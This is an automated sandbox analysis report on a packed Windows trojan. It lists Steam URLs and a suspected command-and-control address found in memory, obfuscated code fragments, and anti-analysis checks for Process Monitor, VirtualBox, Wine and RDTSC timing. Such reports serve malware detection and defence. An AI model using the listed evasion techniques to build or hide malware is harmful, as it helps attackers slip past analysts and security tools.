Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&l=e
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: file.exe, 00000003.00000003.1344132717.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345433349.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000003.00000003.1344132717.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345433349.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: file.exe, 00000003.00000002.1345090990.0000000000A87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/api
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000003.00000002.1345090990.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000003.00000002.1345090990.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997243319001
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49704 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DB0228	3_2_00DB0228
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DEA0D0	3_2_00DEA0D0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084	3_2_00F7E084
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE4040	3_2_00DE4040
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F3A06D	3_2_00F3A06D
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA1000	3_2_00DA1000
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DB2030	3_2_00DB2030
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA71F0	3_2_00DA71F0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F831B5	3_2_00F831B5
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DAE1A0	3_2_00DAE1A0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00E8E143	3_2_00E8E143
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA5160	3_2_00DA5160
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DD82D0	3_2_00DD82D0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DD12D0	3_2_00DD12D0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA12F7	3_2_00DA12F7
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DD23E0	3_2_00DD23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F72381	3_2_00F72381
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA13A3	3_2_00DA13A3
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DAB3A0	3_2_00DAB3A0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DAA300	3_2_00DAA300
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DD64F0	3_2_00DD64F0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DB049B	3_2_00DB049B
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DB4487	3_2_00DB4487
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DCC470	3_2_00DCC470
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DBC5F0	3_2_00DBC5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA35B0	3_2_00DA35B0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00E3052B	3_2_00E3052B
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F77517	3_2_00F77517
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F74501	3_2_00F74501
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7C6FA	3_2_00F7C6FA
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE86F0	3_2_00DE86F0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE8652	3_2_00DE8652
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA164F	3_2_00DA164F
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DDF620	3_2_00DDF620
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00E1071F	3_2_00E1071F
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DDB8C0	3_2_00DDB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00E5B88A	3_2_00E5B88A
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DDE8A0	3_2_00DDE8A0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DAA850	3_2_00DAA850
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DD1860	3_2_00DD1860
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F5F9CC	3_2_00F5F9CC
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DC098B	3_2_00DC098B
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00E7198A	3_2_00E7198A
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE89A0	3_2_00DE89A0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE8A80	3_2_00DE8A80
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE7AB0	3_2_00DE7AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE4A40	3_2_00DE4A40
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7BA0D	3_2_00F7BA0D
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA7BF0	3_2_00DA7BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DBDB6F	3_2_00DBDB6F
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DCCCD0	3_2_00DCCCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00E28CCE	3_2_00E28CCE
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE6CBF	3_2_00DE6CBF
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE8C02	3_2_00DE8C02
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F05D6A	3_2_00F05D6A
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DC8D62	3_2_00DC8D62
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DCFD10	3_2_00DCFD10
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0102CCD8	3_2_0102CCD8
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DCDD29	3_2_00DCDD29
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00E1AECA	3_2_00E1AECA
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DB6EBF	3_2_00DB6EBF
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DABEB0	3_2_00DABEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DCAE57	3_2_00DCAE57
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE8E70	3_2_00DE8E70
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DB4E2A	3_2_00DB4E2A
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DA8FD0	3_2_00DA8FD0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DE7FC0	3_2_00DE7FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00DAAF10	3_2_00DAAF10

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00DBD300 appears 152 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00DACAA0 appears 48 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9996196885313532
Source: file.exe	Static PE information: Section: uaabloyt ZLIB complexity 0.9942581415463297

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@10/2

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_00DD8220 CoCreateInstance,

3_2_00DD8220

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 42%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior

Source: file.exe

Static file information: File size 1872384 > 1048576

Source: file.exe

Static PE information: Raw size of uaabloyt is bigger than: 0x100000 < 0x19f800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 3.2.file.exe.da0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uaabloyt:EW;wktppswf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uaabloyt:EW;wktppswf:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1cf0c4 should be: 0x1d6ae3

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: uaabloyt
Source: file.exe	Static PE information: section name: wktppswf
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F8A0E9 push 38FEC2C1h; mov dword ptr [esp], ebx	3_2_00F8A57F
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0101114A push 575D1682h; mov dword ptr [esp], eax	3_2_01011175
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0101114A push 3D6561C5h; mov dword ptr [esp], ebp	3_2_010111DA
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_01020154 push ecx; mov dword ptr [esp], esi	3_2_01020173
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_01020154 push eax; mov dword ptr [esp], edx	3_2_01020195
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0107115C push ebx; mov dword ptr [esp], edi	3_2_01071407
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 73A9AF60h; mov dword ptr [esp], edx	3_2_00F7E0A3
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 69538500h; mov dword ptr [esp], edi	3_2_00F7E11E
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 61C17300h; mov dword ptr [esp], esi	3_2_00F7E207
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push ebp; mov dword ptr [esp], eax	3_2_00F7E25E
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 13F17889h; mov dword ptr [esp], ebx	3_2_00F7E324
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push ecx; mov dword ptr [esp], eax	3_2_00F7E39E
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 06D4CDD1h; mov dword ptr [esp], ebx	3_2_00F7E3FB
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push eax; mov dword ptr [esp], edi	3_2_00F7E421
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 04539FE3h; mov dword ptr [esp], eax	3_2_00F7E43E
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push edi; mov dword ptr [esp], edx	3_2_00F7E467
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 2B00F400h; mov dword ptr [esp], ebp	3_2_00F7E4BA
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 3C7B5EF9h; mov dword ptr [esp], edi	3_2_00F7E4FB
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 69BAE500h; mov dword ptr [esp], ebx	3_2_00F7E511
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push eax; mov dword ptr [esp], ebp	3_2_00F7E5C4
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push eax; mov dword ptr [esp], 6F6B9896h	3_2_00F7E63C
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push ebp; mov dword ptr [esp], ecx	3_2_00F7E647
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push edx; mov dword ptr [esp], eax	3_2_00F7E675
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push edx; mov dword ptr [esp], eax	3_2_00F7E6D3
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 503E30DDh; mov dword ptr [esp], eax	3_2_00F7E7A4
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push eax; mov dword ptr [esp], ebx	3_2_00F7E80D
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push esi; mov dword ptr [esp], edi	3_2_00F7E867
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push eax; mov dword ptr [esp], edi	3_2_00F7E8C8
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push edi; mov dword ptr [esp], esi	3_2_00F7EA8A
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push ecx; mov dword ptr [esp], edi	3_2_00F7EAA9
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00F7E084 push 3CD49614h; mov dword ptr [esp], ebp	3_2_00F7EAC6

Source: file.exe	Static PE information: section name: entropy: 7.984055290084938
Source: file.exe	Static PE information: section name: uaabloyt entropy: 7.954325094548198

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E042FE second address: E04302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86F93 second address: F86F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86F99 second address: F86F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86F9D second address: F86FBC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD8346DB1F6h 0x00000008 jns 00007FD8346DB1F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jns 00007FD8346DB210h 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86FBC second address: F86FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86FC5 second address: F86FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F86FC9 second address: F86FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8722A second address: F87230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87230 second address: F87241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FD8346DCB26h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87241 second address: F87245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87690 second address: F876A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD8346DCB26h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AB3B second address: F8AB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FFh 0x00000009 popad 0x0000000a rdtsc
